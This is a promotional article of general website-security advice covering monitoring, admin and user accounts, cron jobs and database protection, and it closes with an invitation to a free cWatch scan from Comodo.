It’s great to build some defenses for your website. In fact, these days, it’s effectively mandatory. It is, however, dangerous to rely on them completely. Instead, you always want to be checking your website, using automated tools, and manually. Basically, you should be continually asking yourself the question - “how can I know if the website is safe?”.
How can I know if the website is safe?
If you ask a security expert “how can I know if the website is safe?”, they will point you to five key areas you need to check. These are as follows: automated monitoring, checking your admin users, monitoring user activity, checking your scheduled tasks (Cron jobs), and securing your database.
Automated monitoring
No single human can monitor a website 24/7/365. Even if you had a whole team of humans doing it (and you’d need a pretty large team even for a small website), there would always be the chance of human error. That’s why it’s called human error. Website vulnerability scanners, by contrast, will happily work 24/7/365 to protect your website and there’s no possibility of human error.
The basis of any robust website vulnerability scanner is an antimalware product and a web applications firewall. Just having these will go a long way towards keeping your website safe. Many companies will enhance these with extra services. This means that you can get a whole lot of security for very little money.
You also want to make sure that you have a robust anti-malware product (with an integrated firewall) to protect any devices you use to connect to your website, particularly the back end. That means mobile devices as well as regular computers.
Checking your admin users
This measure requires absolutely nothing in the way of technical skills. All you have to do is keep a regular eye on your user accounts and take action immediately if you notice anything untoward, most notably an account which looks like it shouldn’t be there, then the safest approach is to delete first and ask questions afterward.
If it turns out it was created legitimately, you can always recreate it. Then you need to work out how it came to be created without the proper authorization and records being made.
Speaking of records, you need to be very clear on the fact that user accounts, especially admin accounts, are for the use of the designated person only. Sharing details should be explicitly banned.
Monitoring user activity
This can be partly done through automation but does benefit from some manual checking. You can usually set your website to block users after a certain number of failed login attempts. You can also usually set your website to log out users after a certain period of idleness. Both are highly recommended. You can often delete users if they fail to log at all for a certain period.
This may sound harsh but actually, you’re probably doing them a favor as well as you. If they’re not using your site, then they don’t need their details to be at risk if you are compromised and you don’t need the risk of their account being used to compromise your website (even external accounts can do damage). As with the admin accounts, if they want, they can always recreate them.
In terms of manual checks, as a minimum, keep an eye on login activity. There should be a log of this. Ideally, keep an eye on what users do when they’re on your website. There will generally be a log of error messages. Keep an eye on this.
Checking your scheduled tasks (Cron jobs)
Hackers will often schedule tasks to run when nobody is likely to notice - unless of course, you make a point of keeping an eye on them. Taking a look at your scheduled tasks acts as a double-check to your system logs.
Securing your database
Some hacking attacks are just about making mischief, but these days, many are all about making money. This means that your database is the main prize and as such, it needs to be protected.
First of all, make sure that you’re only collecting data you actually need. The less data you hold, then less attractive your database will be to hackers and the less exposed you’ll be if it is breached.
Secondly, if you are holding any personal data at all, then all copies of that data must be stored encrypted. This includes backups and archives as well as production data.
Thirdly, you need to limit access to your database to people who really need it and give them access only for as long as it is actually needed. Again, sharing login details should be explicitly banned.
Please click here now to have your website scanned, for free, by cWatch from Comodo.
